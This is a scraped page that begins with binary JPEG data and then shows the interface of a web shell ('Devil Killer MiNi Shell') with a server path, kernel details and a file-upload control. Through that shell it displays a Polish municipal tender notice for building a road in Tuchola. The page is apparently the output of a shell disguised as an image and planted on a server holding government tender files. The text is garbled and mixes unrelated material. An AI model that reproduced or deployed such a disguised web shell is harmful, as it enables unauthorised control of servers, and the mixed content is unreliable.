JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251024/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251024/0049459601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa odcinka drogi gminnej nr 010774C – ul. Nad Kiczą w Tucholi </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Tuchola</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 092351156</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">plac Zamkowy 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tuchola</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">89-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL618 - Świecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi212@tuchola.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.miasto.tuchola.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa odcinka drogi gminnej nr 010774C – ul. Nad Kiczą w Tucholi </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-be042847-18b6-4edf-868b-90ded86f0a7e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00494596</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00022169/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Budowa ocinka drogi gminnej nr 010774C -ul. Nad Kiczą w Tucholi</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/tuchola <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Adres strony internetowej, na której udostępniane będą zmiany i wyjaśnienia treści<br/>SWZ oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia.<br/>- strona internetowa prowadzonego postępowania dostępna pod adresem: https://platformazakupowa.pl/tuchola<br/>W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie pytań,<br/>ofert, zawiadomień, wyjaśnień oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia<br/>będą udostępniane na stronie internetowej zamawiającego: https://platformazakupowa.pl/tuchola (link Profilu Nabywcy).<br/>Szczegółowe informacje zawarto w rozdz. 5 SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">5.8. Zamawiający, zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (t.j.Dz. U. z 2020 r. poz.<br/>2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>7) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego<br/>z zegarem Głównego Urzędu Miar.<br/>5.9. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod<br/>linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>2) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem:<br/>https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view<br/>5.10. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z<br/>platformazakupowa.pl, w szczególności za sytuację, gdy Zamawiający zapozna się z treścią oferty przed upływem terminu składania<br/>ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za<br/>ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony<br/>w art. 221 ustawy Pzp.<br/>(...)<br/>5.17. Treść zapytań wraz z wyjaśnieniami Zamawiający udostępnia, bez ujawniania źródła zapytania, na stronie internetowej<br/>prowadzonego postępowania https://platformazakupowa.pl/tuchola, w zakładce „Komunikaty publiczne”.<br/>5.18. Zalecenia Zamawiającego:Rozszerzenia plików wykorzystywanych przez Wykonawców powinny być zgodne<br/>z załącznikiem nr 2 do „Rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności,minimalnych wymagań dla<br/>rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań<br/>dla<br/>systemów<br/>teleinformatycznych”,<br/>zwanego dalej Rozporządzeniem KRI.<br/>5.19. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze szczególnym wskazaniem na .pdf<br/>5.20. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego<br/>z rozszerzeń:<br/>1) zip<br/>2) 7Z<br/>5.21. Wśród rozszerzeń powszechnych a niewystępujących w rozporządzeniu KRI występują:<br/>.rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>5.22. Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi<br/>maksymalnie10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu<br/>osobistego, który wynosi maksymalnie 5MB.<br/>Szczegółowe informacje zawarto w rozdz. 5 SWZ.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/tuchola</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana danych osobowych jest Gmina Tuchola, w imieniu której działa Burmistrz Tucholi wykonujący prawem<br/>określone obowiązki z wykorzystaniem aparatu pomocniczego – Urzędu Miejskiego w Tucholi.<br/>Kontakt: plac Zamkowy 1,89-500 Tuchola, e-mail: burmistrz@tuchola.pl, tel. 52 564 25 00, fax.: 52 334 21 38.<br/>2) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c) RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego prowadzonym w trybie podstawowym bez negocjacji.<br/>3) Odbiorcami Pani/Pana danych osobowych:<br/>- będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 oraz art. 253 Ustawy z<br/>dnia 11września 2019 r. Prawo zamówień publicznych (t.j. Dz.U. z 2024r. poz. 1320 z późn. zm.), dalej „ustawy Pzp”.<br/>- będą upoważnieni pracownicy Administratora Danych Osobowych,<br/>- mogą być podmioty upoważnione na podstawie przepisów prawa oraz podwykonawcy związani z Administratorem Danych<br/>umowami powierzenia przetwarzania danych osobowych.<br/>4) Pani/Pana dane osobowe będą przechowywane zgodnie z art. 78 ust. 1 i 4 ustawy Pzp,<br/>przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia (a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy), a następnie według kategorii archiwalnej dokumentacji postępowania o<br/>udzielenie zamówienia.<br/>5) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>6) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO;<br/>7) W związku z jawnością postępowania o udzielenie zamówienia publicznego Pani/Pana dane osobowe mogą być przekazywane<br/>do państw poza EOG z zastrzeżeniem, o którym mowa w art. 18 ust. 5 Ustawy Pzp.<br/>8) Administrator danych osobowych będzie przetwarzał dane osobowe zebrane w postępowaniu o udzielenie zamówienia w sposób<br/>gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.<br/>9) posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących *;<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania<br/>danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa; gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">10) nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b), d) lub e) RODO prawo do usunięcia danych osobowych,<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c) RODO,<br/>11) w sprawach z zakresu ochrony danych osobowych można kontaktować się z Inspektorem Ochrony Danych, telefonicznie: 52<br/>336 34 33 lub pod adresem e-mail: iod@tuchola.pl<br/>* Wyjaśnienie: w przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego, z uprawnienia, o<br/>którym mowa w art. 15 ust. 1-3 RODO, Zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych<br/>informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać<br/>integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.2.24.2025.AS</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.2.	Przedmiotem zamierzenia budowlanego jest budowa odcinka drogi gminnej nr 010774C – ul. Nad Kiczą w Tucholi wraz z rozbudową i przebudową sieci kanalizacji deszczowej oraz przebudową sieci wodociągowej. Długość projektowanej ulicy wynosi 159,32 m.<br/>Przedsięwzięcie swoim zakresem robót obejmuje:<br/>	rozbiórkę jezdni o nawierzchni bitumicznej,<br/>	rozbiórkę nawierzchni z kostki betonowej,<br/>	rozbiórkę krawężników i obrzeży betonowych,<br/>	wykonanie robót ziemnych,<br/>	budowę oświetlenia przejścia dla pieszych,<br/>	rozbudowę i przebudowę sieci kanalizacji deszczowej oraz przebudowę wodociągu,<br/>	ustawienie krawężników betonowych, oporników betonowych i obrzeży betonowych,<br/>	budowę jezdni ul. Nad Kiczą o nawierzchni z kostki betonowej szarej,<br/>	budowę poszerzenia jezdni o nawierzchni z kostki granitowej,<br/>	budowę drogi dla pieszych o nawierzchni z kostki betonowej szarej,<br/>	budowę dojścia do posesji o nawierzchni z kostki betonowej żółtej,<br/>	budowę zjazdów zwykłych o nawierzchni z kostki betonowej grafitowej,<br/>	budowę pobocza o nawierzchni z kruszywa łamanego,<br/>	odtworzenie jezdni o nawierzchni bitumicznej po robotach związanych z budową kanalizacji deszczowej i przebudową sieci wodociągowej,<br/>	ustawienie znaków stałej organizacji ruchu.<br/>Planowany obiekt budowlany zlokalizowany jest na działkach o nr ewid. 896/1, 899/2, 900/4, 2356/2, 2356/10 (powstała w wyniku podziału działki o nr ewid. 2356/6), 2356/7, 2357/2, 2357/7, 2357/8, 3533, 3536 położonych w obrębie ewid. [0001] Miasto Tuchola, jednostka ewid. [041606_4] Tuchola – Miasto.<br/>Planowana inwestycja zgodnie z art. 39 ust. 6ba pkt. 4 ustawy z dnia 21 marca 1985 r. o drogach publicznych (t.j. Dz. U. z 2025 r. poz. 889) nie wymaga budowy kanału technologicznego.<br/>W ramach inwestycji planowana jest budowa ul. Nad Kiczą w Tucholi o nawierzchni z kostki betonowej szarej i szerokości od 4,00 do 5,05 m. Zaprojektowano poszerzenie jezdni o nawierzchni z kostki granitowej 16/18 cm.<br/>Do posesji zlokalizowanych wzdłuż projektowanej drogi zaprojektowano zjazdy zwykłe o nawierzchni z kostki betonowej grafitowej typu prostokąt (sposób połączenia zjazdów z jezdnią drogi gminnej – skosy 1,50 : 1,50 m).<br/>Przy skrzyżowaniu z drogą wojewódzką nr 241 zaplanowano drogę dla pieszych o szerokości zmiennej 1,80 - 2,50 m o nawierzchni z kostki betonowej szarej. W ramach udogodnienia dla osób niewidomych przy projektowanym przejściu dla pieszych przewidziano nawierzchnie z płytek polimerobetonowych ostrzegawczych w kolorze żółtym oraz nawierzchnie z płytek polimerobetonowych wskaźnikowych podłużnie ryflowanych w kolorze żółtym.<br/>Do posesji zlokalizowanych wzdłuż projektowanej ulicy przewidziano dojścia do posesji o nawierzchni z kostki betonowej żółtej.<br/>Wzdłuż ulicy zaprojektowaniu obustronne pobocza o szerokości 0,75 m o nawierzchni z kruszywa łamanego.<br/>Zaplanowano odtworzenie jezdni o nawierzchni bitumicznej po robotach związanych z budową kanalizacji deszczowej i przebudową sieci wodociągowej.<br/>Jezdnie projektowanych dróg zaplanowano obramować krawężnikiem betonowym najazdowym 15x22 cm, a połączenie istniejącej nawierzchni bitumicznej ul. Nad Kiczą oraz drogi wojewódzkiej nr 241 zaplanowano oddzielić za pomocą opornika betonowego 12x25 cm.<br/>Projektowane zjazdy zwykłe należy obramować za pomocą opornika betonowego 12x25 cm, natomiast drogi dla pieszych i dojścia do posesji obrzeżem betonowym o wymiarach 8x30 cm.<br/>W ramach przedsięwzięcia zaplanowano osłonięcie istniejących kabli energetycznych i telekomunikacyjnych za pomocą rur osłonowych dwudzielnych ∅110 mm. Długość przewidzianego ułożenia rury dwudzielnej wynosi 42,5 m.<br/>W ramach inwestycji zaplanowano również rozbudowę i przebudowę sieci kanalizacji deszczowej oraz przebudowę sieci wodociągowej. <br/>Zakres robót sanitarnych obejmuje budowę:<br/>	kolektora deszczowego z rur PP DN/ID 300 SN8kN/m2 – 884,6 m, <br/>	separatora 20/2020/4 – 1 kpl.,<br/>	studni rewizyjnych z kręgów betonowych DN1200 – 1 kpl.,<br/>	studni rewizyjnych PP DN600 – 4 kpl.,<br/>	studni deszczowe prefabrykowane dn 500 – 4 kpl.,<br/>	przykanalików deszczowych z rur PCV 200/5,9mm SN 8 kN/m2 – 11,5 m,<br/>	wylotu 0216 DN 300 – 1 kpl.,<br/>	narzutu kamiennego z palisadą – 5/7 m2/mb,<br/>	wodociągu z rur PE 160 RC SDR 17 PN 10 – 86,67 m,<br/>	przełączenia istniejącego przyłącza wody DN 50 mm – 3 m,<br/>	hydrantu podziemnego – 1 kpl.<br/>Przedsięwzięcie obejmuje również budowę oświetlenia przejścia dla pieszych.<br/>Szczegółowy opis zamówienia zawierają niżej wymienione dokumenty:<br/>- DECYZJA Starosty Tucholskiego nr 7.12.2025 o zezwoleniu na realizację inwestycji drogowej, z dnia 16 października 2025 r., znak BD.6740.7.12.2025.WK, w sprawie zatwierdzenia projektu zagospodarowania terenu i projektu architektoniczno-budowlanego oraz udzielenia zezwolenia na realizację inwestycji drogowej, polegającej na budowie odcinka drogi gminnej nr 010774C ulicy Nad Kiczą w Tucholi wraz z budową i przebudową sieci kanalizacji deszczowej oraz przebudową sieci wodociągowej, na terenie działek nr ewid. 896/1, 2356/7, 2357/7, 2357/8, 3533, 3536, 2356/10*, 899/2, 900/4, 2356/2, 2357/2 położonych w obrębie geodezyjnym miasto Tuchola, gmina Tuchola (* nieruchomość powstała w wyniku podziału, planowana do przejęcia na rzecz Gminy Tuchola);<br/>- PROJEKT BUDOWLANY – PROJEKT ZAGOSPODAROWANIA TERENU – Budowa odcinka drogi gminnej nr 010774C - ul. Nad Kiczą w Tucholi wraz z budową i przebudową sieci kanalizacji deszczowej oraz przebudową sieci wodociągowej,<br/>- PROJEKT BUDOWLANY – PROJEKT ARCHITEKTONICZNO-BUDOWLANY – Budowa odcinka drogi gminnej nr 010774C - ul. Nad Kiczą w Tucholi wraz z budową i przebudową sieci kanalizacji deszczowej oraz przebudową sieci wodociągowej,<br/>- ZAŁĄCZNIKI PROJEKTU – ZAŁĄCZNIKI PROJEKTU BUDOWLANEGO – Budowa odcinka drogi gminnej nr 010774C – ul. Nad Kiczą w Tucholi wraz z budową i przebudową sieci kanalizacji deszczowej oraz przebudową sieci wodociągowej,<br/>- PROJEKT BUDOWLANY – PROJEKT TECHNICZNY TOM I/III – Projekt Branży Drogowej – Budowa odcinka drogi gminnej nr 010774C - ul. Nad Kiczą w Tucholi wraz z budową i przebudową sieci kanalizacji deszczowej oraz przebudową sieci wodociągowej,<br/>- PROJEKT BUDOWLANY – PROJEKT TECHNICZNY TOM II/III – Projekt Branży Sanitarnej – Budowa odcinka drogi gminnej nr 010774C - ul. Nad Kiczą w Tucholi wraz z budową i przebudową sieci kanalizacji deszczowej oraz przebudową sieci wodociągowej,<br/>- PROJEKT BUDOWLANY – PROJEKT TECHNICZNY TOM III/III – Projekt Branży Elektrycznej – Budowa odcinka drogi gminnej nr 010774C - ul. Nad Kiczą w Tucholi wraz z budową i przebudową sieci kanalizacji deszczowej oraz przebudową sieci wodociągowej,<br/>- PROJEKT BUDOWLANY – PROJEKT WYKONAWCZY TOM I/III – Projekt Branży Drogowej – Budowa odcinka drogi gminnej nr 010774C - ul. Nad Kiczą w Tucholi wraz z budową i przebudową sieci kanalizacji deszczowej oraz przebudową sieci wodociągowej,<br/>- PROJEKT BUDOWLANY – PROJEKT TECHNICZNY TOM II/III – Projekt Branży Sanitarnej – Budowa odcinka drogi gminnej nr 010774C - ul. Nad Kiczą w Tucholi wraz z budową i przebudową sieci kanalizacji deszczowej oraz przebudową sieci wodociągowej,<br/>- PROJEKT BUDOWLANY – PROJEKT WYKONAWCZY TOM I/III – Projekt Branży Elektrycznej – Budowa odcinka drogi gminnej nr 010774C - ul. 